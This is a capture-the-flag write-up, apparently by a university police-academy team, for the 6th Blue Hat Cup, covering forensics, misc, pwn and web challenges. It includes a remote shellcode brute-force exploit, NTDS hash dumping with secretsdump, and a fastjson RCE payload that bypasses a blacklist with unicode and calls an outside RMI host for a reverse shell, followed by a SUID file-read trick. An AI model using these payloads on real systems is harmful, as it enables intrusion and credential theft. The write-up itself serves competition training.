“蓝帽杯"全国大学生网络安全技能大赛,是面向全国公安院校和普通高校大学生的高规格、强影响力的实战技能大赛,被誉为未来网警的“奥运会”。第六届“蓝帽杯"由公安部网络安全保卫局、教育部教育管理信息中心、中华全国总工会·中国职工电化教育中心、中国教育技术协会指导,中国人民公安大学、北京理工大学和奇安信科技集团股份有限公司联合主办。
本次比赛升级为综合性赛事活动,考察选手网络安全攻防对抗、电子取证等安全能力。本次赛事包括比赛、培训、高峰论坛等活动。通过三方合作覆盖全国警院及高校,打造“实战化,体系化,常态化"的网络安全人才培养新机制,为国家重点单位和机构输送网络安全实战型专业人才。
在本次初赛中,我校网安社取得了优异成绩,共有7支队伍成功进入北部赛区半决赛,为学院争光添彩。
-
取证
-
计算机取证_1
-
计算机取证_2
-
计算机取证_3
-
计算机取证_4
-
手机取证_1
-
手机取证_2
-
网站取证_1
-
网站取证_2
-
网站取证_3
-
网站取证_4
-
程序分析_1
-
程序分析_2
-
程序分析_3
-
程序分析_4
-
Misc
-
domainhacker
-
domainhacker2
-
pwn
-
EscapeShellcode
-
WEB
-
Ez_gadget
取证
计算机取证_1
volatility -f 1.dmp --profile=Win7SP1x64 mimikatz
计算机取证_2
volatility -f 1.dmp --profile=Win7SP1x64 pstree
发现MagnetRAMCaptu,对应2192
计算机取证_3
passwarekit解析内存中的秘钥
取证大师挂载解密
导出后用字典爆破这个PPT
打开得到
计算机取证_4
那个新建文本文档.txt是truecrypt
还是用passwarekit+内存移除加密,生成一个test-unprotected
用取证大师解析移除加密后的truecrypt镜像,有个zip
爆破6位数字,991314
得到
flag{1349934913913991394cacacacacacc}
手机取证_1
直接搜照片名导出即可
手机取证_2
直接搜姜总
网站取证_1
D盾扫一扫
上面这个就是
网站取证_2
找到
稍微改改,访问得到KBLT123
<?php
$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("/r/n", "/r", "/n"), "", $str);
$key = 'PanGuShi';
$iv = substr(sha1($key),0,16);
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
mcrypt_generic_init($td, "PanGuShi", $iv);
$decode = base64_decode($str);
$dencrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$dencrypted = trim($dencrypted);
echo $dencrypted;
网站取证_3
找到这里:jyzg123456
网站取证_4
先根据数据库结构,记事本处理下成脚本也可识别的格式
把最后一列弄出来
# -*- coding: UTF-8 -*-
f = open("7.txt",encoding='utf-8')
line = f.readline()
while line:
a = line.split(', ')
print(a[7].strip('n'))
line = f.readline()
php解密脚本改一改,加个循环
<?php
$flag = ['mZVymm9t','lpxqlXFo','l5xummto','m5Zwm3Bn','nJhtlGlm','m5tpmGtm','m5ptnGtu','mZlym25r','m5hpnHBu','m5prlm9u','nJlyl2hu','lptummhs','lpxrl21n','mZRpnHBs','mZpxm2lr','m5dtmGls','mpxvlnBv','mJpynHBt','nJZwm2lu','mpdtnWxq','nJdtlmpr','mZtymHBm','nJlslmpp','l5RunW1p','nJxplXFm','lZdpmm1s','mZZwnW9u','mJVrmmhp','lZZwl3Bs','m5xvm2hm','mpZslmpm','mZtrnGtp','lp1rm21t','nJxplmtp','l5twlXFq','lphqmm9s','m51wmG1q','mJlxlWto','lJ1vmXFq','mpVpmW5r','m5lrlGpr','mpxplm9u','lZpxnHFn','nJdymWpm','mJpum3Fo','lpRrmWto','lZtunXBv','lpprnWtt','lJdslnBr','lJZrnWpm','l5Zrm21m','lJdul2hm','mphylG9q','lZhpm2pp','lZ1qnW1s','nJ1tlHFp','mZxqm2tp','mZdsm21t','mpRvlG9o','mJVqlmhv','mJRwlHBq','l5dtmWtt','mZdylHFt','l5RqlWxn','mZ1um3Fs','lJ1rnWhu','m5pulWhv','lptrnW1u','m5xynWxn','lpRynGtr','mpxulGlm','nJdslm9r','lJhslHBq','nJpwnWhu','mptql2tv','l51xmmlp','mZVymXFn','lJhqnW5q','m5ppmGpr','mZlqm21t','mpZslWxt','mJ1pnHFm','l5drlXBp','mJlvmW1u','mZtxlG5t','nJtsnHFn','l5Rvm29o','m5xvlWxv','m5Zrl2xm','mZlwlG1u','nJpvlWtr','mJxym25s','lpVqnWxv','mZVvl3Fq','lZVtlW5m','lZRqlGhn','nJxqm2hn','nJVtl21s','lJdumWlq','mJtxmGtp','mZxsnHFv','lpdtl2xn','mphqlm5p','lJdxlGpn','lpVvlHFu','lJhvmHBn','l5xunGtv','lZRul2pt','mpdqnGxu','l5Zxlmho','lJppmWhq','nJVylWpp','m5VxnWlr','lpdsnGtq','mZ1tnGpt','mJVqmmtq','l5hslWhm','lZZtl21r','nJlumGlm','lJhsmW9t','lZZym25s','l5tpnHBt','nJVunG1q','mJdtlHFu','mpVtlnFp','mplrnG1t','mJ1ylHBr','nJhynG5m','mplymG1r','lJtxlGxo','lpRxnGlm','mZxwnG5s','mZptnWpn','mJZylGxq','mZZvm3Fo','lJdxnW9t','lZtxmXFv','nJxtlXFm','mJZumW1r','nJ1tmG1p','mplslmpu','lJZxlG5p','nJtxmXBq','lZdxmmtq','lJdrlG1o','mpZtmmlm','mJVxnGpm','mJVwmWxu','mplslWps'];
for ($n = 0; $n < 149; $n++){
$data = $flag[$n];
$key = 'jyzg123456';
$key = md5($key);
$x = 0;
$data = base64_decode($data);
$len = mb_strlen($data);
$l = mb_strlen($key);
$char = '';
$str = '';
for ($i = 0; $i < $len; $i++) {
if ($x == $l) {
$x = 0;
}
$char .= mb_substr($key, $x, 1);
$x++;
}
for ($i = 0; $i < $len; $i++) {
if (ord(mb_substr($data, $i, 1)) < ord(mb_substr($char, $i, 1))) {
$str .= chr((ord(mb_substr($data, $i, 1)) + 256) - ord(mb_substr($char, $i, 1)));
} else {
$str .= chr(ord(mb_substr($data, $i, 1)) - ord(mb_substr($char, $i, 1)));
}
}
echo $str;
echo "n";
}
得到
['619677','381192','485632','827781','944010','870430','864838','659765','840888','862278','959308','375606','382351','600886','668715','834416','786289','569887','927718','734944','934225','679480','953223','405953','980190','230656','627978','512603','227386','886700','723220','672833','392757','980233','477194','341676','897454','558132','196594','710565','852025','780278','268891','939520','565792','302532','275989','362937','133285','122920','422750','135300','749074','240723','291956','994093','681733','633757','706072','511209','507084','434537','639097','401141','695796','192908','865109','372958','889941','309835','785010','933275','143084','967908','771339','498613','619591','141964','860425','651757','723147','590890','432183','556558','678067','973891','406772','886149','822340','657058','966135','589766','311949','616394','214160','201001','981701','914356','135514','578433','683899','334341','741263','138021','316098','146481','485839','205327','731848','428202','160504','919123','818915','333834','694827','511634','443100','224355','955410','143577','229766','470887','915854','534098','714293','752857','599085','949860','759455','178042','308810','687866','664921','529044','626792','138977','278599','984190','525555','994453','753228','128063','978584','238634','132052','724610','518820','517548','753126']
# -*- coding: UTF-8 -*-
m =['619677','381192','485632','827781','944010','870430','864838','659765','840888','862278','959308','375606','382351','600886','668715','834416','786289','569887','927718','734944','934225','679480','953223','405953','980190','230656','627978','512603','227386','886700','723220','672833','392757','980233','477194','341676','897454','558132','196594','710565','852025','780278','268891','939520','565792','302532','275989','362937','133285','122920','422750','135300','749074','240723','291956','994093','681733','633757','706072','511209','507084','434537','639097','401141','695796','192908','865109','372958','889941','309835','785010','933275','143084','967908','771339','498613','619591','141964','860425','651757','723147','590890','432183','556558','678067','973891','406772','886149','822340','657058','966135','589766','311949','616394','214160','201001','981701','914356','135514','578433','683899','334341','741263','138021','316098','146481','485839','205327','731848','428202','160504','919123','818915','333834','694827','511634','443100','224355','955410','143577','229766','470887','915854','534098','714293','752857','599085','949860','759455','178042','308810','687866','664921','529044','626792','138977','278599','984190','525555','994453','753228','128063','978584','238634','132052','724610','518820','517548','753126']
f = open("6.txt",encoding='utf-8')
i = 0;
line = f.readline()
while line:
a = line.split(', ')
a[7]=m[i]
i = i+1
print(a)
line = f.readline()
用上面的脚本替换,然后利用记事本批量处理一下,根据日期得到
相乘
# -*- coding: UTF-8 -*-
f = open("7.txt",encoding='utf-8')
line = f.readline()
while line:
a = line.split(', ')
print(float(a[3])*int(a[7].strip('n')))
line = f.readline()
因为float的问题,不用管,直接加
再相加
p = 0
flag = [24787.08,15247.68,19425.28,33111.24,37760.4,34817.2,34593.520000000004,26390.600000000002,33635.520000000004,34491.12,38372.32,15024.24,15294.04,36053.159999999996,40122.9,50064.96,47177.34,34193.22,55663.079999999994,44096.64,56053.5,40768.799999999996,57193.38,20297.65,49009.5,11532.800000000001,31398.9,25630.15,11369.300000000001,44335.0,36161.0,33641.65,19637.850000000002,49011.65,33403.58,23917.320000000003,62821.780000000006,39069.240000000005,13761.580000000002,49739.55,59641.75000000001,54619.46000000001,18822.370000000003,93952.0,56579.200000000004,30253.2,27598.9,36293.700000000004,13328.5,18438.0,63412.5,20295.0,112361.09999999999,36108.45,43793.4,149113.94999999998,102259.95,95063.55,105910.8,76681.34999999999,76062.59999999999,73871.29000000001,108646.49,68193.97,118285.32,32794.36,147068.53,63402.86000000001,151289.97,52671.950000000004,133451.7,158656.75,24324.280000000002,164544.36000000002,177407.97,114680.99,142505.93,32651.72,197897.75,149904.11000000002,166323.81,129995.8,95080.26,122442.76,149174.74,214256.02,89489.84,194952.78,180914.8,164264.5,241533.75,147441.5,77987.25,154098.5,53540.0,50250.25,245425.25,228589.0,39299.06,167745.56999999998,198330.71,96958.89,214966.27,40026.09,63219.600000000006,29296.2,97167.8,41065.4,146369.6,85640.40000000001,32100.800000000003,183824.6,163783.0,93473.52,194551.56000000003,143257.52000000002,124068.00000000001,62819.40000000001,267514.80000000005,40201.560000000005,75822.78,155392.71000000002,302231.82,176252.34,235716.69,248442.81,197698.05000000002,313453.8,250620.15000000002,62314.7,108083.5,240753.09999999998,232722.34999999998,185165.4,219377.19999999998,48641.95,97509.65,344466.5,183944.25,348058.55,263629.8,44822.049999999996,342504.39999999997,88294.58,48859.24,268105.7,191963.4,191492.76,278656.62]
for i in range(len(flag)):
p +=flag[i]
print(p)
得到15758353.76
程序分析_1
在线分析:https://mogua.co/static_analyzer/?name=EXEC.apk&checksum=4606097ab3e8b7f42e8628996fdd4a62&type=apk
程序分析_2
android.intent.action.MAIN指定入口,在这个xml里进行定义,找到
程序分析_3
一进来就看见有个base64,解开是个网址,提交正确
程序分析_4
一直翻源码翻到了这里,有安全判断,应该没错
有一个f (d.a.a.c.a.a(this))进行判断,跟进到d.a.a.c.a,类名就是a
Misc
domainhacker
流量里提出一个压缩包
蚁剑流量,有压缩包的密码
解压找到对应的NTLM即可,要flag包起来
domainhacker2
跟上面一样拿到压缩包密码:FakePassword123$
然后参考:https://www.freebuf.com/articles/network/251267.html从NTDS.dit获取域散列值,用https://github.com/SecureAuthCorp/impacket中的secretsdump.py,一把梭
pwn
EscapeShellcode
要写shellcode,程序已经完成了or,需要我们将在bss段上flag的w出来,
我们进入到我们写的shellcode之后,寄存器除了rip其他的都被扬了,
没办法利用其他的地址,只能lea r13,[rip]将rip中的地址整到r13中,
然而我们flag的地址与heap地址偏移随机,需要爆破三位,
然后我们可以将上面的看作固定偏移进行一个遍历
有如下脚本:
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,'x00'))
uu64 = lambda data :u64(data.ljust(8,'x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
for i in range(9999):
p = remote("39.107.124.203",16714)
#p = process('./escape_shellcode')
num = 0x1000 * i
shellcode = '''
lea r13, [rip]
sub r13, 0x351
add r13, 0x120
sub r13, '''+str(num)+'''
mov rdi, 1
mov rsi, r13
mov rax, 1
mov rdx, 0xff
syscall
'''
sl(asm(shellcode))
p.close()
自动爆破
WEB
Ez_gadget
反编译得到主要的源码:
-
JSONController.java
package BOOT-INF.classes.com.example.spring;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.example.spring.secret;
import java.util.Objects;
import java.util.regex.Pattern;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
@Controller
public class JSONController
{
@ResponseBody
@RequestMapping({"/"})
public String hello() { return "Your key is:" + secret.getKey(); }
@ResponseBody
@RequestMapping({"/json"})
public String Unserjson(@RequestParam String str, @RequestParam String input) throws Exception {
if (str != null &&
Objects.hashCode(str) == secret.getKey().hashCode() && !secret.getKey().equals(str)) { // 绕过1
String pattern = ".*rmi.*|.*jndi.*|.*ldap.*|.*\\x.*"; // 绕过2
Pattern p = Pattern.compile(pattern, 2);
boolean StrMatch = p.matcher(input).matches();
if (StrMatch) {
return "Hacker get out!!!";
}
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
JSON.parseObject(input);
}
return "hello";
}
}
fastjson 1.2.62 rce漏洞,但是有两个绕过,首先是绕过 hashCode() 对字符串 key 的比较,这里直接参考 虎符CTF2022 ezchain 这道题就行了
只需要前两个字符串计算出的hashcode相等即可。
访问靶机环境,获取key:
根据上述文章中的思路,很容易计算得到符合要求的key字符串:
k0R7AqTK5czIIfbk
这就绕过了第一个限制,对于题目的第二个限制,我们直接通过unicode编码即可绕过:
{"@type":"u006fu0072u0067u002eu0061u0070u0061u0063u0068u0065u002eu0078u0062u0065u0061u006eu002eu0070u0072u006fu0070u0065u0072u0074u0079u0065u0064u0069u0074u006fu0072u002eu004au006eu0064u0069u0043u006fu006eu0076u0065u0072u0074u0065u0072","AsText":"u0072u006du0069://47.117.125.220:1099/iqfcrq"}
发送以下payload,成功反弹shell:
str=k0R7AqTK5czIIfbk&input={"@type":"u006fu0072u0067u002eu0061u0070u0061u0063u0068u0065u002eu0078u0062u0065u0061u006eu002eu0070u0072u006fu0070u0065u0072u0074u0079u0065u0064u0069u0074u006fu0072u002eu004au006eu0064u0069u0043u006fu006eu0076u0065u0072u0074u0065u0072","AsText":"u0072u006du0069://47.117.125.220:1099/iqfcrq"}
flag再/root/flag.txt,suid提权即可读取flag:
/bin/date -f /root/flag.txt
原文始发于微信公众号(山警网络空间安全实验室):第六届“蓝帽杯”全国大学生网络安全技能大赛部分wp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论